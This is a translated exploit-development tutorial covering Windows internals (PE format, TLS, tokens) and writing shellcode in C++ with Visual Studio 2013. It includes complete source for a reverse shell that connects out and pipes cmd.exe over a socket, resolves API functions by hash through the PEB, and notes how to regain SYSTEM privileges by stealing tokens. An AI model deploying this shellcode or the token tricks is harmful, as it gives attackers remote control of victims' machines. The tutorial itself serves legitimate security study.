Exploit Development Tutorial Series: Windows Basics & Shellcode

Date: 2019-11-21

P3nro5e · 2015/09/17 22:21

from: http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

Windows Basics

0x00 Windows Basics

This article briefly covers some general facts about Windows that every Windows developer should know.

0x01 Win32 API

The main Windows API is provided through several DLLs (Dynamic Link Libraries). An application can import functions from those DLLs and call them. This keeps ordinary user-mode applications portable.

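0x02 PE file format

Executables and DLLs are both PE (Portable Executable) files. Each PE file contains an import table and an export table. The import table specifies the functions to import and the files (modules) in which they are located. The export table specifies the exported functions, that is, the functions that can be imported by other PE files.

A PE file is composed of several sections (a code section, a data section, and so on). The .reloc section contains the information needed to relocate the executable or DLL in memory. Although some addresses in the code are relative (for example, those of relative jmp instructions), many are absolute and therefore depend on where the module is loaded.

The Windows loader searches for DLLs starting from the current working directory, so an application can be distributed with a DLL that differs from the one in the system directory (\windows\system32). The resulting versioning (incompatibility) problem is what some people call DLL hell.

An important concept to understand is the Relative Virtual Address (RVA). PE files use RVAs to specify the position of elements relative to the base address of the module. In other words, if a module is loaded at address B (the base address) and an element of that module has RVA X, then the element's Virtual Address (VA) in memory is B+X.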
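
The B+X relationship can be written down as a tiny sketch. The helper names rva_to_va and va_to_rva are made up for this illustration, and the base address 0x400000 and RVA 0x100 are sample values only, not taken from a real module.

```python
def rva_to_va(base_address: int, rva: int) -> int:
    """Convert a Relative Virtual Address into an absolute Virtual Address."""
    return base_address + rva


def va_to_rva(base_address: int, va: int) -> int:
    """Inverse conversion: recover the RVA of an element from its VA."""
    return va - base_address


# Illustrative values: module loaded at 0x400000, element at RVA 0x100.
print(hex(rva_to_va(0x400000, 0x100)))
```

The same addition is what the shellcode performs later every time it writes baseAddress + someRVA.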

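0x03 Threads

If you are used to Windows, you should already be familiar with the concept of threads. If you come from Linux, however, keep in mind that Windows gives CPU time slices to threads. You can create new processes with CreateProcess() and new threads with CreateThread(). Threads execute within the address space of the process they belong to, so their memory is shared.

Threads also have limited support for non-shared memory through a mechanism called TLS (Thread Local Storage).

Basically, the TEB of each thread contains a main TLS array of 64 DWORDs, plus an additional TLS array of 1024 DWORDs that is allocated at run time when the main array runs out of free slots. First, an index corresponding to a position in one of the two arrays must be allocated with TlsAlloc(), which returns the index. The DWORD at that index can then be read with TlsGetValue(index) and written with TlsSetValue(index, newValue). For example, TlsGetValue(7) reads the DWORD at index 7 of the TLS array in the TEB of the current thread.

Note: we could emulate this mechanism by using GetCurrentThreadId(), but it would not work as well.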
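
To make the emulation idea concrete, here is a minimal Python sketch that keys a shared table by thread id, with threading.get_ident() standing in for GetCurrentThreadId(). The names tls_set_value and tls_get_value are invented for this sketch and are not the Windows API; the lock hints at why such an emulation is clumsier than real TLS, which needs no shared table.

```python
import threading

_slots = {}                      # (thread id, index) -> value
_slots_lock = threading.Lock()   # the shared table needs locking, unlike real TLS


def tls_set_value(index, value):
    with _slots_lock:
        _slots[(threading.get_ident(), index)] = value


def tls_get_value(index):
    with _slots_lock:
        return _slots.get((threading.get_ident(), index), 0)


def worker(results, name):
    tls_set_value(7, name)             # each thread writes its own slot 7
    results[name] = tls_get_value(7)   # and reads back only its own value


results = {}
threads = [threading.Thread(target=worker, args=(results, n)) for n in ("a", "b")]
for t in threads:
    t.start()
for t in threads:
    t.join()
```

Each worker sees only the value it stored itself, and the main thread, which never wrote slot 7, reads the default 0.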

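0x04 Tokens

Tokens describe access rights. Like a file handle, a token is just a 32-bit integer. Each process maintains an internal structure that holds the access-rights information associated with its tokens.

There are two types of tokens: primary tokens and impersonation tokens. Whenever a process is created, it is assigned a primary token. Each thread of the process can either use the token of the process or obtain an impersonation token from another process. When LogonUser() is called with valid credentials, it can return an impersonation token, which cannot be used with CreateProcessAsUser() unless you call DuplicateTokenEx() to convert it into a primary token.

A token can be attached to the current thread with SetThreadToken(newToken) and removed with RevertToSelf(), which makes the thread revert to the primary token.

Consider a user who connects to a server on Windows and sends a username and password. The server, running as SYSTEM, calls LogonUser() with the supplied credentials and, if they are correct, receives a new token. The server then creates a new thread, and that thread calls SetThreadToken(new_token), where new_token is the token returned by LogonUser(). From then on the thread runs with the same privileges as the user. When the thread has finished serving the client, it is either destroyed or it calls RevertToSelf() and is added to the pool of free threads.

If you can take control of such a server, you can get back to SYSTEM privileges by calling RevertToSelf(), or by looking for other tokens in memory and attaching them to the current thread with SetThreadToken().

Note that CreateProcess() uses the primary token as the token of the new process. This is a problem when the thread that calls CreateProcess() holds an impersonation token with more privileges than the primary token: the new process will have fewer privileges than the thread that created it.

The solution is to use DuplicateTokenEx() to create a new primary token from the impersonation token of the current thread, and then to create the new process by calling CreateProcessAsUser() with that new primary token.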

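Shellcode

0x00 Introduction

Shellcode is a piece of code that an exploit sends as its payload; it is injected into the vulnerable application and executed there. Shellcode must be self-contained and should not contain null bytes, because it is usually copied by functions such as strcpy(), which stop copying at the first null byte, so shellcode that contains one would be copied only partially. Shellcode is usually written directly in assembly, but in this article we will develop it in C/C++ with Visual Studio 2013. The benefits of this environment are:

1. Shorter development time.

2. IntelliSense.

3. Easy debugging.

We will use VS 2013 to produce an executable that contains our shellcode, and a Python script to extract the shellcode and fix it (that is, remove the null bytes).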
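
The null-byte restriction mentioned in the introduction is easy to see in a small sketch. The function strcpy_like below is a made-up stand-in that mimics what a C strcpy() would copy; the sample payload reuses the push/call byte sequence shown in the next section purely as test data.

```python
def strcpy_like(src: bytes) -> bytes:
    """Return the bytes a C strcpy() would copy: everything before the first NUL."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


def has_null_bytes(shellcode: bytes) -> bool:
    return b"\x00" in shellcode


# Sample data: PUSH 64h followed by a CALL through an absolute address.
payload = bytes.fromhex("6A64FF1590201900")
copied = strcpy_like(payload)
print(len(payload), len(copied))
```

The last byte of the absolute address is a null byte, so the copy stops one byte short and the call instruction arrives truncated.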

0x01 C/C++ code

Use only stack variables

To write position independent code, we must use only stack variables. This means that we cannot write

char *v = new char[100];

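because that array would be allocated on the heap. Worse, the code would try to call the new operator function in msvcr120.dll through an absolute address: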

00191000 6A 64                push        64h
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]

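Location 192090h contains the address of the function. If we want to call a function imported from a library, we must do so directly, without relying on the import table and the Windows loader. Another problem is that the new operator probably requires some initialization performed by the C/C++ runtime.

We cannot use global variables either: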

int x;
 
int main() {
  x = 12;
}

The code above (if it is not optimized away) produces:

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch

where 8E9130h is the absolute address of the variable x.

Strings are a problem too. If we write

char str[] = "I'm a string";

printf(str);

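the string is placed in the .rdata section of the executable and is referenced through an absolute address.

You must not use printf in your shellcode: this is only an example to show how str is referenced.

Here is the asm code: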

00A71006 8D 45 F0             lea         eax,[str]
00A71009 56                   push        esi
00A7100A 57                   push        edi
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
00A71010 8D 7D F0             lea         edi,[str]
00A71013 50                   push        eax
00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]

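As you can see, the string is located in the .rdata section at address A72100h and is copied onto the stack (str points to the stack) by movsd and movsb instructions. Note that A72100h is an absolute address, so this code is clearly not position independent.

If we write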

char *str = "I'm a string";
printf(str);

the string is still placed in the .rdata section, but it is not copied onto the stack:

00A31000 68 00 21 A3 00       push        0A32100h
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]

The string is in the .rdata section at the absolute address A32100h.

How can we make this code position independent?

The simpler (partial) solution:

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

The corresponding assembly code is:

012E1006 8D 45 F0             lea         eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
012E1010 50                   push        eax
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]

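Except for the call to printf, this code is position independent, because the pieces of the string are encoded directly in the source operands of the mov instructions. Once the string has been built on the stack, it can be used.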
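
To check how the string ends up inside the mov operands, the following sketch splits it into little-endian dwords the way the listing above does. The function name string_to_mov_immediates is invented for this illustration.

```python
import struct


def string_to_mov_immediates(text: bytes):
    """Split text into little-endian dwords plus the leftover tail bytes."""
    whole = len(text) - len(text) % 4
    dwords = [struct.unpack_from("<I", text, i)[0] for i in range(0, whole, 4)]
    return dwords, text[whole:]


dwords, tail = string_to_mov_immediates(b"I'm a string\x00")
print([f"{d:08X}h" for d in dwords], tail)
```

The three dwords match the immediates 206D2749h, 74732061h and 676E6972h in the disassembly, and the remaining terminator is the byte written by the final mov byte ptr instruction.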

Unfortunately, this method stops working when the string reaches a certain length. The code

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

produces

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8             lea         eax,[str]
013E1011 50                   push        eax
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]

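As you can see, part of the string is located in the .rdata section at address 13E2100h, while the rest of the string is encoded in the source operands of mov instructions as before.

The solution I came up with is to allow code like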

char *str = "I'm a very long string";

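and to fix the shellcode with a Python script. The script needs to extract the referenced strings from the .rdata section, put them into the shellcode, and fix the relocations. We will see how shortly.

Do not call the Windows API directly

In C/C++ code, we cannot write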

WaitForSingleObject(procInfo.hProcess, INFINITE);

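because WaitForSingleObject is a function imported from kernel32.dll.

In a nutshell, a PE file contains an import table and an import address table (IAT). The import table holds information about which functions to import from which libraries. The IAT is filled in by the Windows loader when the executable is loaded and holds the addresses of the imported functions. The code of the executable calls imported functions through this level of indirection. For example: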

001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]

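Address 1D2094h is the location of the IAT entry that contains the address of the function MessageBoxA. This level of indirection is useful because the call instruction above does not need to be fixed (unless the executable is relocated). The only thing the Windows loader needs to fix is the dword at 1D2094h, which holds the address of MessageBoxA.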
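
As a small illustration of that indirection, this sketch pulls the IAT slot address out of the six bytes of the call instruction shown above. The helper decode_indirect_call is hypothetical and only recognizes the FF 15 form (call through an absolute 32-bit memory operand).

```python
import struct


def decode_indirect_call(code: bytes):
    """Return the absolute address used by `call dword ptr ds:[addr]`, or None."""
    if len(code) >= 6 and code[0] == 0xFF and code[1] == 0x15:
        return struct.unpack_from("<I", code, 2)[0]
    return None


iat_slot = decode_indirect_call(bytes.fromhex("FF1594201D00"))
print(hex(iat_slot))
```

The decoded value is the address of the IAT slot, not of MessageBoxA itself, which is exactly why the instruction embeds an absolute address that shellcode cannot rely on.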

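The solution is to get the addresses of the Windows functions directly from the data structures that Windows keeps in memory. We will see how later.

Create a new project

Go to File→New→Project…, select Installed→Templates→Visual C++→Win32→Win32 Console Application, choose a name for the project (I called it shellcode) and click OK.

Go to Project→<project name> properties; a new dialog appears. Apply the changes to all configurations (Release and Debug) by setting Configuration (top left of the dialog) to All Configurations. Then expand Configuration Properties and, under General, change Platform Toolset to Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013).

This lets you use some features of C++11 and C++14, such as static_assert.

Shellcode example

Here is the code for a simple reverse shell. Add a file named shellcode.cpp to the project and copy this code into it. Do not try to understand all of the code right now; we will discuss it in detail later.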

// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
// NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".
 
#include <WinSock2.h>               // must precede #include <windows.h>
#include <WS2tcpip.h>
#include <windows.h>
#include <winnt.h>
#include <winternl.h>
#include <stddef.h>
#include <stdio.h>
 
#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))
 
_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}
 
DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}
 
DWORD getFunctionHash(const char *moduleName, const char *functionName) {
    return getHash(moduleName) + getHash(functionName);
}
 
LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
    int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset);
}
 
// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
//       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
 
        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);
 
        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
    } while (ptr != first);
 
    return NULL;            // address not found
}
 
#define HASH_LoadLibraryA           0xf8b7108d
#define HASH_WSAStartup             0x2ddcd540
#define HASH_WSACleanup             0x0b9d13bc
#define HASH_WSASocketA             0x9fd4f16f
#define HASH_WSAConnect             0xa50da182
#define HASH_CreateProcessA         0x231cbe70
#define HASH_inet_ntoa              0x1b73fed1
#define HASH_inet_addr              0x011bfae2
#define HASH_getaddrinfo            0xdc2953c9
#define HASH_getnameinfo            0x5c1c856e
#define HASH_ExitThread             0x4b3153e0
#define HASH_WaitForSingleObject    0xca8e9498
 
#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
int entryPoint() {
//  printf("0x%08x\n", getFunctionHash("kernel32.dll", "WaitForSingleObject"));
//  return 0;
 
    // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
    //       they're not strictly needed.
 
    DefineFuncPtr(LoadLibraryA);
 
    My_LoadLibraryA("ws2_32.dll");
 
    DefineFuncPtr(WSAStartup);
    DefineFuncPtr(WSASocketA);
    DefineFuncPtr(WSAConnect);
    DefineFuncPtr(CreateProcessA);
    DefineFuncPtr(inet_ntoa);
    DefineFuncPtr(inet_addr);
    DefineFuncPtr(getaddrinfo);
    DefineFuncPtr(getnameinfo);
    DefineFuncPtr(ExitThread);
    DefineFuncPtr(WaitForSingleObject);
 
    const char *hostName = "127.0.0.1";
    const int hostPort = 123;
 
    WSADATA wsaData;
 
    if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))
        goto __end;         // error
    SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
        goto __end;
 
    addrinfo *result;
    if (My_getaddrinfo(hostName, NULL, NULL, &result))
        goto __end;
    char ip_addr[16];
    My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);
 
    SOCKADDR_IN remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(hostPort);
    remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);
 
    if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
        goto __end;
 
    STARTUPINFOA sInfo;
    PROCESS_INFORMATION procInfo;
    SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = STARTF_USESTDHANDLES;
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
    My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);
 
    // Waits for the process to finish.
    My_WaitForSingleObject(procInfo.hProcess, INFINITE);
 
__end:
    My_ExitThread(0);
 
    return 0;
}
 
int main() {
    return entryPoint();
}

Compiler configuration

Go to Project→<project name> properties, expand Configuration Properties and then select C/C++. Apply the changes to the Release configuration.

These are the settings to change:

General:
- SDL Checks: No (/sdl-)

This may not be necessary, but I turned them off anyway.

Optimization:
- Optimization: Minimize Size (/O1)

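This is very important! We want the shellcode to be as small as possible.

- Inline Function Expansion: Only __inline (/Ob1)

This setting tells VS 2013 to inline only the functions defined with _inline. main() just calls the shellcode's entryPoint function. If entryPoint is short, it might be inlined into main(). That would be disastrous, because main() would no longer mark the end of the shellcode (in fact, it would contain part of it). We will see why later.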

- Enable Intrinsic Functions: Yes (/Oi)

I do not know whether this setting should be disabled.

- Favor Size Or Speed: Favor small code (/Os)

- Whole Program Optimization: Yes (/GL)

Code Generation:
- Security Check: Disable Security Check (/GS-)

We do not need security checks!

- Enable Function-Level linking: Yes (/Gy)

Linker configuration

Go to Project→<project name> properties, expand Configuration Properties and then look at Linker. Apply the changes to the Release configuration. These are the relevant settings to change:

General:
- Enable Incremental Linking: No (/INCREMENTAL:NO)
Debugging:
- Generate Map File: Yes (/MAP)

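This tells the linker to generate a map file describing the structure of the EXE.

- Map File Name: mapfile

This is the name of the map file. You can choose any name you like.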

Optimization:
- References: Yes (/OPT:REF)

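This option is very important for producing small shellcode, because it removes the functions and data that the code never references.

- Enable COMDAT Folding: Yes (/OPT:ICF)

- Function Order: function_order.txt

This setting makes the linker read a file named function_order.txt, which specifies the order in which functions must appear in the code section. We want entryPoint to be the first function in the code section, so function_order.txt contains a single line with the string ?entryPoint@@YAHXZ. You can find the function names in the map file.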
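
If you do not want to search the map file by hand, a few lines of Python can pull out the decorated name. This is only a sketch: find_decorated_names is a made-up helper, and the sample lines are a hypothetical excerpt that follows the symbol-line layout quoted later in the extraction script, with invented offsets and addresses.

```python
def find_decorated_names(map_lines, plain_name):
    """Yield decorated symbol names from map-file lines that contain plain_name."""
    for line in map_lines:
        parts = line.split()
        # Symbol lines look like: <section>:<offset> <symbol> <address> ...
        if len(parts) > 2 and ":" in parts[0] and plain_name in parts[1]:
            yield parts[1]


# Hypothetical excerpt; the offsets and addresses are made up for illustration.
sample_map = [
    " 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj",
    " 0001:00000274       _main                      00401274 f   shellcode.obj",
]
names = list(find_decorated_names(sample_map, "entryPoint"))
print(names)
```

The name it finds is what goes on the single line of function_order.txt.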

getProcAddrByHash

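This function returns the address of a function exported by a module (.exe or .dll) that is present in memory, given the hash associated with the module and the function. It is certainly possible to look functions up by name, but that would waste space, because the names would have to be included in the shellcode. A hash, on the other hand, is only 4 bytes. Since we do not use two hashes (one for the module and one for the function), getProcAddrByHash has to consider all the modules loaded in memory.

For example, the hash of the function MessageBoxA, which is exported by user32.dll, can be computed as follows: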

DWORD hash = getFunctionHash("user32.dll", "MessageBoxA");

The resulting hash is the sum of getHash("user32.dll") and getHash("MessageBoxA"). The implementation of getHash is straightforward:

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}
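
For computing hashes outside the C++ project, the routine can be ported to Python. This is a sketch rather than part of the original toolchain: the names get_hash and get_function_hash are mine, the input is assumed to be plain ASCII, and the explicit 32-bit masks stand in for the DWORD wrap-around that C provides for free.

```python
MASK32 = 0xFFFFFFFF


def ror32(value: int, count: int) -> int:
    return ((value >> count) | (value << (32 - count))) & MASK32


def get_hash(name: str) -> int:
    h = 0
    for ch in name.encode("ascii"):
        h = ror32(h, 13)
        # Same rule as the C code: anything >= 'a' is shifted down by 32.
        h = (h + (ch - 32 if ch >= ord("a") else ch)) & MASK32
    return h


def get_function_hash(module_name: str, function_name: str) -> int:
    return (get_hash(module_name) + get_hash(function_name)) & MASK32


print(hex(get_hash("AB")))
```

Calling get_function_hash("user32.dll", "MessageBoxA") gives the same value whatever the letter case of either argument.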

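As you can see, the hash is case-insensitive. This matters because in some versions of Windows the names in memory are all uppercase. First, getProcAddrByHash gets the address of the PEB (Process Environment Block), which it reaches through the TEB (Thread Environment Block):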

PEB *peb = getPEB();

where

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

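The selector fs is associated with a segment that starts at the address of the TEB. At offset 30h, the TEB contains a pointer to the PEB (Process Environment Block). We can see this in WinDbg: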

0:000> dt _TEB @$teb
ntdll!_TEB
+0x000 NtTib            : _NT_TIB
+0x01c EnvironmentPointer : (null)
+0x020 ClientId         : _CLIENT_ID
+0x028 ActiveRpcHandle  : (null)
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
+0x034 LastErrorValue   : 0
+0x038 CountOfOwnedCriticalSections : 0
+0x03c CsrClientThread  : (null)
<snip>

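The PEB is associated with the current process and contains, among other things, information about the modules loaded into the process address space. Here is getProcAddrByHash again: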

PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
        .
        .
        .
    } while (ptr != first);
 
    return NULL;            // address not found
}

Here is part of the PEB:

0:000> dt _PEB @$peb
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0x8 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00060000 Void
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null)
   +0x018 ProcessHeap      : 0x00680000 Void
   <snip>

At offset 0Ch there is a field called Ldr, which points to a PEB_LDR_DATA structure. Let's look at it in WinDbg:

0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null)
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
   +0x024 EntryInProgress  : (null)
   +0x028 ShutdownInProgress : 0 ''
   +0x02c ShutdownThreadId : (null)

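InMemoryOrderModuleList is a doubly-linked list of LDR_DATA_TABLE_ENTRY structures associated with the modules loaded in the address space of the current process. To be precise, InMemoryOrderModuleList is a LIST_ENTRY, which contains two fields: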

0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
+0x000 Flink            : Ptr32 _LIST_ENTRY
+0x004 Blink            : Ptr32 _LIST_ENTRY

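Flink is the forward link and Blink is the backward link. Flink points to the LDR_DATA_TABLE_ENTRY of the first module. Well, not exactly:

Flink points to a LIST_ENTRY structure contained in the LDR_DATA_TABLE_ENTRY structure.

Let's look at how LDR_DATA_TABLE_ENTRY is defined: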

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY
+0x008 InMemoryOrderLinks : _LIST_ENTRY
+0x010 InInitializationOrderLinks : _LIST_ENTRY
+0x018 DllBase          : Ptr32 Void
+0x01c EntryPoint       : Ptr32 Void
+0x020 SizeOfImage      : Uint4B
+0x024 FullDllName      : _UNICODE_STRING
+0x02c BaseDllName      : _UNICODE_STRING
+0x034 Flags            : Uint4B
+0x038 LoadCount        : Uint2B
+0x03a TlsIndex         : Uint2B
+0x03c HashLinks        : _LIST_ENTRY
+0x03c SectionPointer   : Ptr32 Void
+0x040 CheckSum         : Uint4B
+0x044 TimeDateStamp    : Uint4B
+0x044 LoadedImports    : Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
+0x04c PatchInformation : Ptr32 Void
+0x050 ForwarderLinks   : _LIST_ENTRY
+0x058 ServiceTagLinks  : _LIST_ENTRY
+0x060 StaticLinks      : _LIST_ENTRY
+0x068 ContextInformation : Ptr32 Void
+0x06c OriginalBase     : Uint4B
+0x070 LoadTime         : _LARGE_INTEGER

InMemoryOrderModuleList.Flink points to _LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks, which is at offset 8, so we must subtract 8 to get the address of the _LDR_DATA_TABLE_ENTRY.
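
The subtraction is the usual "containing record" trick, sketched below. The function entry_from_link is a name chosen for this illustration; the offset 0x08 comes from the dt _LDR_DATA_TABLE_ENTRY output, and the sample link address is the InMemoryOrderModuleList Flink value 0x683088 from the _PEB_LDR_DATA dump above.

```python
IN_MEMORY_ORDER_LINKS_OFFSET = 0x08   # from the dt _LDR_DATA_TABLE_ENTRY output


def entry_from_link(link_address: int,
                    link_offset: int = IN_MEMORY_ORDER_LINKS_OFFSET) -> int:
    """Return the address of the structure that embeds the LIST_ENTRY at link_address."""
    return link_address - link_offset


# InMemoryOrderModuleList.Flink as shown in the _PEB_LDR_DATA dump.
print(hex(entry_from_link(0x683088)))
```

This is what getDataTableEntry does in the shellcode, with offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks) supplying the offset.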

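First, let's get the Flink pointer of InMemoryOrderModuleList:

+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]

Its value is 0x683088, so the _LDR_DATA_TABLE_ENTRY structure is at 0x683088 – 8 = 0x683080. Note that the dump below was taken at 0x683078 (the InLoadOrderModuleList Flink, 0x683080, minus 8), which is 8 bytes too low, so every field appears shifted by 8 bytes: the value displayed as SizeOfImage (0x60000) is actually DllBase, and the string displayed as BaseDllName is actually FullDllName.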

0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
   +0x018 DllBase          : (null)
   +0x01c EntryPoint       : (null)
   +0x020 SizeOfImage      : 0x60000
   +0x024 FullDllName      : _UNICODE_STRING "蒮ｍ쿟ﾹ엘ﾬ膪ｎ???"
   +0x02c BaseDllName      : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
   +0x034 Flags            : 0x120010
   +0x038 LoadCount        : 0x2034
   +0x03a TlsIndex         : 0x68
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]
   +0x03c SectionPointer   : 0x00004000 Void
   +0x040 CheckSum         : 0xffff
   +0x044 TimeDateStamp    : 0x6841b4
   +0x044 LoadedImports    : 0x006841b4 Void
   +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : 0x4ce7979d Void
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
